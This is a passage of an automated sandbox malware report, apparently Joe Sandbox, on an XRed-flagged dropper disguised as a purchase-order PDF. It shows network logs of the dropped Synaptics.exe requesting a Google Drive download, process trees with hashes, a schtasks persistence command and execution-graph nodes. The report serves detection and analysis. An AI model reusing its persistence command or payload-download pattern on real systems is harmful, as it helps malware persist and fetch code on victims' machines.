                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                      Date: Mon, 30 Dec 2024 10:41:16 GMT
                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-SELyxZVyxKIac3XXmW1Pfw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                      Content-Length: 1652
                                                                                                                      Server: UploadServer
                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                      Connection: close
2024-12-30 10:41:16 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
2024-12-30 10:41:16 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="EqW2K1ZJ58dH-uRIpCl9cw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
2024-12-30 10:41:16 UTC | 115 | IN | Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
105 | 192.168.2.6 | 50093 | 142.250.185.78 | 443 | 4508 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:41:16 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Host: docs.google.com
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Cookie: NID=520=XEpDunbM2jQWLDhJ4ZLTX75bwqESkJo47WZJ2ujDLcGVKux2c-y7Jt7SY2aovNvhVjyCrbsCNa1YWwhYHv1wufDt8UkHy2EpzgZJne1VtYUPaU7sFeHdum4NnesSqtEqek7CrfPHvlEkK3tH86_IjZKl8iznNzk3DIi_ygFA8ncsOsTOg97wWyr7
2024-12-30 10:41:16 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                      Content-Type: application/binary
                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                      Date: Mon, 30 Dec 2024 10:41:16 GMT
                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-860HS0jj_r002CWUH-0Ofw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                      Server: ESF
                                                                                                                      Content-Length: 0
                                                                                                                      X-XSS-Protection: 0
                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                      Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
106 | 192.168.2.6 | 50091 | 142.250.185.65 | 443 | 4508 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:41:16 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Cookie: NID=520=XEpDunbM2jQWLDhJ4ZLTX75bwqESkJo47WZJ2ujDLcGVKux2c-y7Jt7SY2aovNvhVjyCrbsCNa1YWwhYHv1wufDt8UkHy2EpzgZJne1VtYUPaU7sFeHdum4NnesSqtEqek7CrfPHvlEkK3tH86_IjZKl8iznNzk3DIi_ygFA8ncsOsTOg97wWyr7
2024-12-30 10:41:17 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                                                      X-GUploader-UploadID: AFiumC6R6v887du7yFWK-XOO73OpzxQKUe_nHEJIzLTszQ79hYMngt-TmKzYKyg6p_GJkr3w
                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                      Date: Mon, 30 Dec 2024 10:41:16 GMT
                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-FHDGDe9qD_cptlMcLJboGw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                      Content-Length: 1652
                                                                                                                      Server: UploadServer
                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                      Connection: close
2024-12-30 10:41:17 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
2024-12-30 10:41:17 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="n9xItGVYEYJVqw4AnjYmPg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
2024-12-30 10:41:17 UTC | 115 | IN | Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
107 | 192.168.2.6 | 50089 | 142.250.185.78 | 443 | 4508 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:41:16 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Host: docs.google.com
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Cookie: NID=520=XEpDunbM2jQWLDhJ4ZLTX75bwqESkJo47WZJ2ujDLcGVKux2c-y7Jt7SY2aovNvhVjyCrbsCNa1YWwhYHv1wufDt8UkHy2EpzgZJne1VtYUPaU7sFeHdum4NnesSqtEqek7CrfPHvlEkK3tH86_IjZKl8iznNzk3DIi_ygFA8ncsOsTOg97wWyr7
2024-12-30 10:41:16 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                      Content-Type: application/binary
                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                      Date: Mon, 30 Dec 2024 10:41:16 GMT
                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-12Ixnu0Cjem6RvUK5Wvclw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                      Server: ESF
                                                                                                                      Content-Length: 0
                                                                                                                      X-XSS-Protection: 0
                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                      Connection: close


                                                                                                                      Target ID:0
                                                                                                                      Start time:05:40:25
                                                                                                                      Start date:30/12/2024
                                                                                                                      Path:C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:"C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exe"
                                                                                                                      Imagebase:0x400000
                                                                                                                      File size:2'203'648 bytes
                                                                                                                      MD5 hash:38D3095D1B748CD53C65395718D7C5F4
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:Borland Delphi
                                                                                                                      Yara matches:
                                                                                                                      • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: 00000000.00000000.2138979280.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000000.00000000.2138979280.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                      Reputation:low
                                                                                                                      Has exited:true

                                                                                                                      Target ID:2
                                                                                                                      Start time:05:40:26
                                                                                                                      Start date:30/12/2024
                                                                                                                      Path:C:\Users\user\Desktop\._cache_New PO - Supplier 16-12-2024-Pdf.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:"C:\Users\user\Desktop\._cache_New PO - Supplier 16-12-2024-Pdf.exe"
                                                                                                                      Imagebase:0xb40000
                                                                                                                      File size:1'432'064 bytes
                                                                                                                      MD5 hash:DF6FA61AC1509C2D8B720690829D5634
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Antivirus matches:
                                                                                                                      • Detection: 100%, Avira
                                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                                      • Detection: 87%, ReversingLabs
                                                                                                                      Reputation:low
                                                                                                                      Has exited:false

                                                                                                                      Target ID:3
                                                                                                                      Start time:05:40:27
                                                                                                                      Start date:30/12/2024
                                                                                                                      Path:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:"C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
                                                                                                                      Imagebase:0x400000
                                                                                                                      File size:771'584 bytes
                                                                                                                      MD5 hash:ACA4D70521DE30563F4F2501D4D686A5
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:Borland Delphi
                                                                                                                      Yara matches:
                                                                                                                      • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: 00000003.00000003.2237237113.000000000061F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
                                                                                                                      Antivirus matches:
                                                                                                                      • Detection: 100%, Avira
                                                                                                                      • Detection: 100%, Avira
                                                                                                                      • Detection: 100%, Avira
                                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                                      • Detection: 92%, ReversingLabs
                                                                                                                      Reputation:low
                                                                                                                      Has exited:true

                                                                                                                      Target ID:4
                                                                                                                      Start time:05:40:28
                                                                                                                      Start date:30/12/2024
                                                                                                                      Path:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:"C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
                                                                                                                      Imagebase:0xcc0000
                                                                                                                      File size:53'161'064 bytes
                                                                                                                      MD5 hash:4A871771235598812032C822E6F68F19
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:high
                                                                                                                      Has exited:false

                                                                                                                      Target ID:5
                                                                                                                      Start time:05:40:28
                                                                                                                      Start date:30/12/2024
                                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c schtasks /create /tn BBLXFG.exe /tr C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe /sc minute /mo 1
                                                                                                                      Imagebase:0x1c0000
                                                                                                                      File size:236'544 bytes
                                                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:high
                                                                                                                      Has exited:true

                                                                                                                      Target ID:6
                                                                                                                      Start time:05:40:28
                                                                                                                      Start date:30/12/2024
                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                      Imagebase:0x7ff66e660000
                                                                                                                      File size:862'208 bytes
                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:high
                                                                                                                      Has exited:true

                                                                                                                      Target ID:7
                                                                                                                      Start time:05:40:28
                                                                                                                      Start date:30/12/2024
                                                                                                                      Path:C:\Windows\SysWOW64\wscript.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:WSCript C:\Users\user\AppData\Local\Temp\BBLXFG.vbs
                                                                                                                      Imagebase:0x9f0000
                                                                                                                      File size:147'456 bytes
                                                                                                                      MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Yara matches:
                                                                                                                      • Rule: JoeSecurity_ProcessChecker, Description: Yara detected ProcessChecker, Source: 00000007.00000002.3396869708.00000000007F8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_ProcessChecker, Description: Yara detected ProcessChecker, Source: 00000007.00000002.3397773164.0000000002C10000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_ProcessChecker, Description: Yara detected ProcessChecker, Source: 00000007.00000002.3396869708.0000000000817000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      Reputation:high
                                                                                                                      Has exited:false

                                                                                                                      Target ID:8
                                                                                                                      Start time:05:40:29
                                                                                                                      Start date:30/12/2024
                                                                                                                      Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:schtasks /create /tn BBLXFG.exe /tr C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe /sc minute /mo 1
                                                                                                                      Imagebase:0x710000
                                                                                                                      File size:187'904 bytes
                                                                                                                      MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:high
                                                                                                                      Has exited:true

                                                                                                                      Target ID:9
                                                                                                                      Start time:05:40:29
                                                                                                                      Start date:30/12/2024
                                                                                                                      Path:C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe
                                                                                                                      Imagebase:0xe50000
                                                                                                                      File size:1'432'064 bytes
                                                                                                                      MD5 hash:DF6FA61AC1509C2D8B720690829D5634
                                                                                                                      Has elevated privileges:false
                                                                                                                      Has administrator privileges:false
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Antivirus matches:
                                                                                                                      • Detection: 100%, Avira
                                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                                      • Detection: 87%, ReversingLabs
                                                                                                                      Reputation:low
                                                                                                                      Has exited:true

                                                                                                                      Target ID:12
                                                                                                                      Start time:05:40:36
                                                                                                                      Start date:30/12/2024
                                                                                                                      Path:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:"C:\ProgramData\Synaptics\Synaptics.exe"
                                                                                                                      Imagebase:0x400000
                                                                                                                      File size:771'584 bytes
                                                                                                                      MD5 hash:ACA4D70521DE30563F4F2501D4D686A5
                                                                                                                      Has elevated privileges:false
                                                                                                                      Has administrator privileges:false
                                                                                                                      Programmed in:Borland Delphi
                                                                                                                      Reputation:low
                                                                                                                      Has exited:true

                                                                                                                      Target ID:14
                                                                                                                      Start time:05:40:44
                                                                                                                      Start date:30/12/2024
                                                                                                                      Path:C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:"C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe"
                                                                                                                      Imagebase:0xe50000
                                                                                                                      File size:1'432'064 bytes
                                                                                                                      MD5 hash:DF6FA61AC1509C2D8B720690829D5634
                                                                                                                      Has elevated privileges:false
                                                                                                                      Has administrator privileges:false
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:true

                                                                                                                      Target ID:15
                                                                                                                      Start time:05:40:53
                                                                                                                      Start date:30/12/2024
                                                                                                                      Path:C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:"C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe"
                                                                                                                      Imagebase:0xe50000
                                                                                                                      File size:1'432'064 bytes
                                                                                                                      MD5 hash:DF6FA61AC1509C2D8B720690829D5634
                                                                                                                      Has elevated privileges:false
                                                                                                                      Has administrator privileges:false
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:true

                                                                                                                      Target ID:17
                                                                                                                      Start time:05:41:01
                                                                                                                      Start date:30/12/2024
                                                                                                                      Path:C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe
                                                                                                                      Imagebase:0xe50000
                                                                                                                      File size:1'432'064 bytes
                                                                                                                      MD5 hash:DF6FA61AC1509C2D8B720690829D5634
                                                                                                                      Has elevated privileges:false
                                                                                                                      Has administrator privileges:false
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:true

                                                                                                                      Target ID:20
                                                                                                                      Start time:05:41:06
                                                                                                                      Start date:30/12/2024
                                                                                                                      Path:C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:"C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe"
                                                                                                                      Imagebase:0xe50000
                                                                                                                      File size:1'432'064 bytes
                                                                                                                      MD5 hash:DF6FA61AC1509C2D8B720690829D5634
                                                                                                                      Has elevated privileges:false
                                                                                                                      Has administrator privileges:false
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:true

                                                                                                                      Target ID:21
                                                                                                                      Start time:05:41:07
                                                                                                                      Start date:30/12/2024
                                                                                                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 4508 -s 8704
                                                                                                                      Imagebase:0x6d0000
                                                                                                                      File size:483'680 bytes
                                                                                                                      MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:true

                                                                                                                      Target ID:22
                                                                                                                      Start time:05:42:00
                                                                                                                      Start date:30/12/2024
                                                                                                                      Path:C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe
                                                                                                                      Imagebase:0xe50000
                                                                                                                      File size:1'432'064 bytes
                                                                                                                      MD5 hash:DF6FA61AC1509C2D8B720690829D5634
                                                                                                                      Has elevated privileges:false
                                                                                                                      Has administrator privileges:false
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:true


                                                                                                                        Execution Graph

                                                                                                                        Execution Coverage:2.3%
                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                        Signature Coverage:6.2%
                                                                                                                        Total number of Nodes:1460
                                                                                                                        Total number of Limit Nodes:139
106939->106940 106946 e6c929 106940->106946 106942 e6bf22 106943 e6bf3e 106942->106943 106949 e6c8b7 48 API calls _memmove 106942->106949 106945 e71b2a 52 API calls __cinit 106943->106945 106945->106937 106950 e6c955 106946->106950 106949->106942 106951 e6c948 106950->106951 106952 e6c962 106950->106952 106951->106942 106952->106951 106953 e6c969 RegOpenKeyExW 106952->106953 106953->106951 106954 e6c983 RegQueryValueExW 106953->106954 106955 e6c9a4 106954->106955 106956 e6c9b9 RegCloseKey 106954->106956 106955->106956 106956->106951 106957 ec1edb 106962 e5131c 106957->106962 106959 ec1ee1 106995 e71b2a 52 API calls __cinit 106959->106995 106961 ec1eeb 106963 e5133e 106962->106963 106996 e51624 106963->106996 106968 e5d3d2 48 API calls 106969 e5137e 106968->106969 106970 e5d3d2 48 API calls 106969->106970 106971 e51388 106970->106971 106972 e5d3d2 48 API calls 106971->106972 106973 e51392 106972->106973 106974 e5d3d2 48 API calls 106973->106974 106975 e513d8 106974->106975 106976 e5d3d2 48 API calls 106975->106976 106977 e514bb 106976->106977 107004 e51673 106977->107004 106981 e514eb 106982 e5d3d2 48 API calls 106981->106982 106983 e514f5 106982->106983 107033 e5175e 106983->107033 106985 e51540 106986 e51550 GetStdHandle 106985->106986 106987 ec58da 106986->106987 106988 e515ab 106986->106988 106987->106988 106989 ec58e3 106987->106989 106990 e515b1 CoInitialize 106988->106990 107040 e99bd1 53 API calls 106989->107040 106990->106959 106992 ec58ea 107041 e9a2f6 CreateThread 106992->107041 106994 ec58f6 CloseHandle 106994->106990 106995->106961 107042 e517e0 106996->107042 106999 e57e53 48 API calls 107000 e51344 106999->107000 107001 e516db 107000->107001 107056 e51867 6 API calls 107001->107056 107003 e51374 107003->106968 107005 e5d3d2 48 API calls 107004->107005 107006 e51683 107005->107006 107007 e5d3d2 48 API calls 107006->107007 107008 e5168b 107007->107008 107057 e57d70 107008->107057 107011 e57d70 48 API calls 107012 e5169b 107011->107012 107013 e5d3d2 48 
API calls 107012->107013 107014 e516a6 107013->107014 107015 e7010a 48 API calls 107014->107015 107016 e514c5 107015->107016 107017 e516f2 107016->107017 107018 e51700 107017->107018 107019 e5d3d2 48 API calls 107018->107019 107020 e5170b 107019->107020 107021 e5d3d2 48 API calls 107020->107021 107022 e51716 107021->107022 107023 e5d3d2 48 API calls 107022->107023 107024 e51721 107023->107024 107025 e5d3d2 48 API calls 107024->107025 107026 e5172c 107025->107026 107027 e57d70 48 API calls 107026->107027 107028 e51737 107027->107028 107029 e7010a 48 API calls 107028->107029 107030 e5173e 107029->107030 107031 e51747 RegisterWindowMessageW 107030->107031 107032 ec24a6 107030->107032 107031->106981 107034 ec67dd 107033->107034 107035 e5176e 107033->107035 107062 e9d231 50 API calls 107034->107062 107036 e7010a 48 API calls 107035->107036 107038 e51776 107036->107038 107038->106985 107039 ec67e8 107040->106992 107041->106994 107063 e9a2dc 54 API calls 107041->107063 107049 e517fc 107042->107049 107045 e517fc 48 API calls 107046 e517f0 107045->107046 107047 e5d3d2 48 API calls 107046->107047 107048 e5165b 107047->107048 107048->106999 107050 e5d3d2 48 API calls 107049->107050 107051 e51807 107050->107051 107052 e5d3d2 48 API calls 107051->107052 107053 e5180f 107052->107053 107054 e5d3d2 48 API calls 107053->107054 107055 e517e8 107054->107055 107055->107045 107056->107003 107058 e5d3d2 48 API calls 107057->107058 107059 e57d79 107058->107059 107060 e5d3d2 48 API calls 107059->107060 107061 e51693 107060->107061 107061->107011 107062->107039 107064 e76a80 107065 e76a8c __getstream 107064->107065 107101 e78b7b GetStartupInfoW 107065->107101 107068 e76a91 107103 e7a937 GetProcessHeap 107068->107103 107069 e76ae9 107070 e76af4 107069->107070 107191 e76bd0 47 API calls 3 library calls 107069->107191 107104 e787d7 107070->107104 107073 e76afa 107074 e76b05 __RTC_Initialize 107073->107074 107192 e76bd0 47 API calls 3 library calls 107073->107192 107125 e7ba66 107074->107125 
107077 e76b14 107078 e76b20 GetCommandLineW 107077->107078 107193 e76bd0 47 API calls 3 library calls 107077->107193 107144 e83c2d GetEnvironmentStringsW 107078->107144 107081 e76b1f 107081->107078 107085 e76b45 107157 e83a64 107085->107157 107088 e76b4b 107089 e76b56 107088->107089 107195 e71d7b 47 API calls 3 library calls 107088->107195 107171 e71db5 107089->107171 107092 e76b5e 107093 e76b69 __wwincmdln 107092->107093 107196 e71d7b 47 API calls 3 library calls 107092->107196 107175 e53682 107093->107175 107096 e76b7d 107097 e76b8c 107096->107097 107188 e72011 107096->107188 107197 e71da6 47 API calls _doexit 107097->107197 107100 e76b91 __getstream 107102 e78b91 107101->107102 107102->107068 107103->107069 107198 e71e5a 30 API calls 2 library calls 107104->107198 107106 e787dc 107199 e78ab3 InitializeCriticalSectionAndSpinCount 107106->107199 107108 e787e1 107109 e787e5 107108->107109 107201 e78afd TlsAlloc 107108->107201 107200 e7884d 50 API calls 2 library calls 107109->107200 107112 e787ea 107112->107073 107113 e787f7 107113->107109 107114 e78802 107113->107114 107202 e77616 107114->107202 107117 e78844 107210 e7884d 50 API calls 2 library calls 107117->107210 107120 e78849 107120->107073 107121 e78823 107121->107117 107122 e78829 107121->107122 107209 e78724 47 API calls 4 library calls 107122->107209 107124 e78831 GetCurrentThreadId 107124->107073 107126 e7ba72 __getstream 107125->107126 107219 e78984 107126->107219 107128 e7ba79 107129 e77616 __calloc_crt 47 API calls 107128->107129 107131 e7ba8a 107129->107131 107130 e7baf5 GetStartupInfoW 107139 e7bc33 107130->107139 107141 e7bb0a 107130->107141 107131->107130 107132 e7ba95 @_EH4_CallFilterFunc@8 __getstream 107131->107132 107132->107077 107133 e7bcf7 107226 e7bd0b LeaveCriticalSection _doexit 107133->107226 107135 e7bc7c GetStdHandle 107135->107139 107136 e77616 __calloc_crt 47 API calls 107136->107141 107137 e7bc8e GetFileType 107137->107139 107138 e7bb58 107138->107139 107142 e7bb8a GetFileType 
